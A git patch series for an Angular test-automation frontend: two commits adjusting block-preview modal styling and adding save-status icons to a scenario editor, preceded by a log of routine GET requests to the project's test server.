request[{"Time":1667227331975,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227351059,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/635688ce42797f1390c87c6b"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227358706,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227390797,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227390804,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227402094,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227405645,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227405651,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227451806,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227533240,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227533248,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227535375,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227537668,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227537675,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227545695,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227547938,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227547944,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227696441,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a1e942797f1390c87c71"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227700411,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227700436,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/report/reporting_1667225693110"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227969000,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227972214,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227972222,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227978793,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227981223,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227981230,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227982121,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/reportHistory/6357a20842797f1390c87c74"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227987923,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag/backendInfo"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227987954,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/run/report/DAISY-Smoketests1666860416368"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227993331,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] +sended request[{"Time":1667227993338,"reqMethod":"GET","reqURL":"https://ad-daisy-seed01.test-server.ag:442/mongo/getBlocks/63565da342797f1390c87c65"},{"normalizedNames":{},"lazyUpdate":null,"headers":{}}] From fab9eff87885a1706e6463b9d18db5e8e84ba4f2 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Fri, 4 Nov 2022 13:22:43 +0100 Subject: [PATCH 15/50] Preview Block. New overall view --- .../add-block-form.component.css | 25 +++++++++++++++---- .../add-block-form.component.html | 9 +++---- .../save-block-form.component.css | 18 ++++++------- .../save-block-form.component.html | 8 +++--- 4 files changed, 35 insertions(+), 25 deletions(-) diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.css b/frontend/src/app/modals/add-block-form/add-block-form.component.css index 78acb514d..d0705a31f 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.css +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.css @@ -2,6 +2,9 @@ .subHeader{ margin-left: 5px; margin-top: 5px; + text-align: center; + font-size: 16px; + font-weight: bold; } .disabled { @@ -11,25 +14,31 @@ table { width: 100%; margin-top:5px; + padding: 0 10px 0; } -.mat-table .mat-cell:first-child, .mat-table .mat-header-cell:first-child{ +.mat-table .mat-cell:first-child{ border-right: 1px solid #e0e0e0; } -.mat-cell, .mat-header-cell { +.mat-cell { text-align: center; } .normalButton:disabled{ opacity: 20%; } - -td.mat-cell:last-of-type, td.mat-footer-cell:last-of-type, th.mat-header-cell:last-of-type{ +.modal-ccc{ + width: 110%; +} +td.mat-cell:last-of-type, td.mat-footer-cell:last-of-type{ padding-right: 0px; + padding: 0 10px 0; + word-break: break-all; } -td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type, th.mat-header-cell:first-of-type{ +td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ padding-left: 0px; + padding: 0 5px 0; } .dividerContainer{ @@ -46,6 +55,7 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type, th.mat-header-cell: flex: 1; overflow-y: auto; border-bottom: 0px; + padding: 5px; } ::ng-deep div.mat-list-item-content.mat-list-item-content-reverse .deleteBlockButton{ @@ -94,4 +104,9 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type, th.mat-header-cell: flex-direction: column; justify-content: center; align-items: center; + } +::ng-deep .modal-content{ + width: 110%; + transform: translate(-3%, 0); +} diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.html b/frontend/src/app/modals/add-block-form/add-block-form.component.html index 65df7a05c..25a8c16d8 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.html +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.html @@ -26,16 +26,13 @@

{{block.name}}

Preview

Preview: {{selectedBlock.name}}

- +
- - + - - + -
Steptype {{element.stepType}} {{element.stepType}} Step {{element.pre}} {{ element.values[0] }} {{element.mid}} {{ element.values[1]}} {{ element.values[2]}} {{ element.values[3]}} {{element.pre}} {{ element.values[0] }} {{element.mid}} {{ element.values[1]}} {{ element.values[2]}} {{ element.values[3]}}
diff --git a/frontend/src/app/modals/save-block-form/save-block-form.component.css b/frontend/src/app/modals/save-block-form/save-block-form.component.css index 194e1c8d6..19a42b350 100644 --- a/frontend/src/app/modals/save-block-form/save-block-form.component.css +++ b/frontend/src/app/modals/save-block-form/save-block-form.component.css @@ -10,6 +10,7 @@ padding-right: 10px; } + .blockNameContainer{ border-bottom: 1px solid #e0e0e0; padding-bottom: 10px; @@ -44,11 +45,11 @@ table { margin: 5px } -.mat-table .mat-cell:first-child, .mat-table .mat-header-cell:first-child{ +.mat-table .mat-cell:first-child{ border-right: 1px solid #e0e0e0; } -.mat-cell, .mat-header-cell { +.mat-cell { text-align: center; } @@ -57,16 +58,12 @@ td.mat-cell { padding: 5px; } -th.mat-header-cell { - text-align: start; - padding: 5px; -} - -td.mat-cell:last-of-type, td.mat-footer-cell:last-of-type, th.mat-header-cell:last-of-type{ +td.mat-cell:last-of-type, td.mat-footer-cell:last-of-type{ padding-right: 0px; + word-break: break-all; } -td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type, th.mat-header-cell:first-of-type{ +td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ padding-left: 0px; } @@ -111,4 +108,7 @@ label { flex-direction: column; justify-content: center; align-items: center; + transform: translate(-3%, 0); + width: 110%; + } diff --git a/frontend/src/app/modals/save-block-form/save-block-form.component.html b/frontend/src/app/modals/save-block-form/save-block-form.component.html index 1f3b85366..ef272370f 100644 --- a/frontend/src/app/modals/save-block-form/save-block-form.component.html +++ b/frontend/src/app/modals/save-block-form/save-block-form.component.html @@ -1,5 +1,6 @@ - + From f2fef0385dcd0f38f8b2bf1db6a6d58d290695c0 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Fri, 28 Oct 2022 18:23:42 +0200 Subject: [PATCH 16/50] Symbols in story-bar. New save button --- .../scenario-editor.component.css | 19 +++- .../scenario-editor.component.html | 8 +- .../app/stories-bar/stories-bar.component.css | 13 ++- .../stories-bar/stories-bar.component.html | 94 ++++++++++++++---- frontend/src/assets/save-done.png | Bin 0 -> 26563 bytes frontend/src/assets/unsaved.png | Bin 0 -> 26430 bytes 6 files changed, 106 insertions(+), 28 deletions(-) create mode 100644 frontend/src/assets/save-done.png create mode 100644 frontend/src/assets/unsaved.png diff --git a/frontend/src/app/scenario-editor/scenario-editor.component.css b/frontend/src/app/scenario-editor/scenario-editor.component.css index 76985ec7e..c82771a0d 100644 --- a/frontend/src/app/scenario-editor/scenario-editor.component.css +++ b/frontend/src/app/scenario-editor/scenario-editor.component.css @@ -2,12 +2,17 @@ padding: 0px; margin: 0px; } +.scenarioTitle > .mat-icons{ + transform: translateY(-5px); + width: 25px; +} .scenarioHeaderContainer{ display: grid; grid-template-columns: 1fr auto 1fr auto; margin: 0 20px; padding: 12px 0 12px 0; + position: relative; } :host ::ng-deep .mat-form-field-appearance-standard .mat-form-field-flex { @@ -98,7 +103,19 @@ table { /* .scenario_unsaved { color: red !important; } */ - +.saveDone{ + display: block; + position: absolute; + bottom:0; + left:0; + background: transparent; + border: none; + margin-right: 2px; +} +.material-icons-merged{ + height: 71%; + width: 194%; +} .title span[rel="def"] { font-weight: normal; diff --git a/frontend/src/app/scenario-editor/scenario-editor.component.html b/frontend/src/app/scenario-editor/scenario-editor.component.html index 2fbdb1bee..5f921d7e8 100644 --- a/frontend/src/app/scenario-editor/scenario-editor.component.html +++ b/frontend/src/app/scenario-editor/scenario-editor.component.html @@ -34,10 +34,14 @@ - +
-
-
    -
  • - +
    +
    +
    + +
    +
    +
    + + + + folder_open + + +
    +
    +
    + +
    +
      +
    • + diff --git a/frontend/src/assets/save-done.png b/frontend/src/assets/save-done.png new file mode 100644 index 0000000000000000000000000000000000000000..e8fb46b19d1b51248493f758d1b6e0996f3dd0e6 GIT binary patch literal 26563 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 N>+5XO&eC)U`9CJhw6XvI literal 0 HcmV?d00001 diff --git a/frontend/src/assets/unsaved.png b/frontend/src/assets/unsaved.png new file mode 100644 index 0000000000000000000000000000000000000000..19ea39f6c904c6ce05a5949c8c85aae2d2897171 GIT binary patch literal 26430 zcmeHP30#cZ`+wWCrxk5XLrA7sYFb9Cl2U1vvSpg48tu)rAzdw&XmJy5N?H&ql{QO4 zDrr%dC}jx|il|gH|9Ly!Yq{5-{4V$Y?yvLt%=yka=Q-y&=lh)Vyyu)*c3Lc7D#$0r z2SJdav5|ol3vuvEcnT}#{#E`G1WjGD(Z-HpMGioD`+7Ok+^Hx=kT(@Y4Wv0kP+;5j zM0?*kr#-jbDdWR#FwoEh@w_SrOH?PiCSH{ODu<=XDaybg!F2=C|-Fg`mU&E_}!c5-Ab9}^IpHx=pT)v1fPwIN!z9EmBK6< z84PI1>2650f1P08^ETMF6i9%p5@Wu&rC0K;Ri zA-7FpqdNIcmq46whWoq-HFTWt^NTr4l1xv%T{0@TG*We~lQpBWXleYA-GyNHS1lcf zSEQa{-@j~q{(8TcB^AA1Uh37W5d&K7P%zqgnCmPF+sgkehX*ZG%^{c#|onq9gOIHBi^*;Dk9-FjvjmpB&UEmA0>6)c~h%yiZwluF@33 zx`kZgMRpCF1@V#82H!`?O%ldD1p5Zt{M~yhOT#k7I(@qz)E=SsGUL@&-rs(vmPw>H zSPkt@98D_eD=6N*?NR;BmWbjb>z-&g^tEOA&pwS^I@GeWLTl`>U{UoBAFf;SxpJZs~CEucTNS*wF>7xJRIThBCEchK8r>9*trpYPCy~Q%FElKj)%D#SX`Mw%9!q z>!uGhygV-XBs^&oPnjT=epKM;E_X->jdEHe`TT))Yr4N;omSngEP0`)HR{Rnxd$kj z^}_-w`HGbXZ02NkoEOwd*lJQv58Gqhw-zP7YB}Hgszygh#>iv8x2j}q z`T0=$-m}$e8}1pZ*b6eQ-W^j`?mM^kxQZK}dBT86Y|B~4x4}IX+lTlXMx{G-IJ--) zC3GI5+@7Z*R_RswF18MPuPkKsC7reULmnww^OD)LxHeoc9GuE9=;*UVjg~E%mMtgr zSnGbhfX%K;xF=y+ez&M9dz(@*G)3>)Xl1WE(r2z+;R%k)r|(oq+gvU48>v1!TJNY| zRIDUrgj85T8NBz(?)3gS`AH2DuWOWDODgExC(IwX8n5)aS!-HT-8K3)y18ui;|T28 z{u>Gl^G9FK`Q_fdX;au1H?Q^OROGZtyFB;V+Oe~vA&a+STLm4Op{NdLk;}VJhy@ki z-t?w?CwFvLEqRs_g_f*m<3*og!24UTwG5kogo<+iI-jMD9Bx@qSK1WS+SBpw@tEnh z#mOaa9czMTOCHTPpT1eMV&rv+*!{#;r{35LiB@SPvN?B;tq5dp7C3z>xsBkmD5F!# z`_4L7376?gf`|9%NHv{}dc(cvZP!a3okM0rrq5(W8~ANQl$6`Vw~c1>zwcmT78D|!S>0FCSVgVniOtB?-ETFhDVZhNR4|=g6wP)|W1b+J zY$&@?$0f~cq`=m8?W-rtx3sw?G!;ozMFbj>MjHx!gR5lQH&#!ZrPh{BwdqF-tQKG6 z$=NLPIO@$xsNC;`K$PNZ`5n{?4{zS!N73(6%3D=_Yj`z($6E7x*O6bv)<*SstDLpx zR&eWkUZ+mE#bd0%*B{@NogTk!Cf_45K4;xUzUjRun-tFZXYd~^&bzU4O4hZ25_7My z$c6xq>NB{vakGdF-72)j!qG{l z#b96KjGCmbL=kq$G=rM`f(_!jYVuch6x?zPQd`6<)QlXyAeb0eAaZxt{dvxw(@1)% z4M)vtkEQcTo$@Y=nUfcqoIEoqSdh6K<4oT@P44*?S|btcJy5_nCE-e4pSU;yEks5oZC6s5x-etXzqAD(Tlx>6{$rj}0u9YE>&=s=a(@-~w@qMDj`5J)z_y)PCoOdL1pL(kFN1bGpef-bl?d zk~ZZdxE@$yeQWRRr>6Yq(Nd-Sq+px#@=tT^`gfYW;yN0T?eb)+M4|bS67j7fRtL7< zIrxk=|1x>R9TRqGi{-_9?sV%2s!Oie3sDcZoNdp#vgVfO$}fGGY$cP``y{Tdvy#`% zlkeQ@9hCyN7NJ@Uvz%k;slIk~{@6IXpwP4%3{Ocd`P&N<%ze;ho*fYzhaz=pjybO# zpKkJ7w(5klf+i_pr;GTb=jTrgvI z^Zs&=JJNSLFe0Awc}3U`{1T$;R&2Q+8sWNNDATfh$8w9=Li?P!B1yKQLKum&?I(9& zmvt&!GKgY#6*rgGzHtVlwn`z1R%I?+_`wdphE=z{*nni4~ zNxg}7D|98U<=c>+WZhcz>t&;Y3&q-~qoGf3XWJZp{`xf`?rG3g^`5PBLa%VzD>aKS zuQS!51^60;^>c>yT_>1Wo|L8>^iq7D6421A7r0wMb5P0Qg^Bb{o%&ZsZmA5l(xY2# zPQz(?>Af#~ zqJ&RumPJpm_I8g+mt&~CCO+zT}x3s zSLnUl!k@%q__=~LFvo@Rxns85xbW-&Q@g-dT4aueM-p2x>;eVcSl zGXAFa6+Bn?ko0;TG*4O8{r#Fp%iBo9u0?q|radI(&~gX*@hs1TdQI`g9gpmv$XXQH z7b)+qb&MkyiAJ2M6ziQ6yWBx`0LA6Bq>;zmH}<@NrqHp}dd9Vm1Ej0ASX^)EX8!UA z0v;v@1*e^xa%NG}lbrqf_A$@V#<*gd&&whqL%m3g*0^`7_q?4r2P8!W1iNE42k^Pl 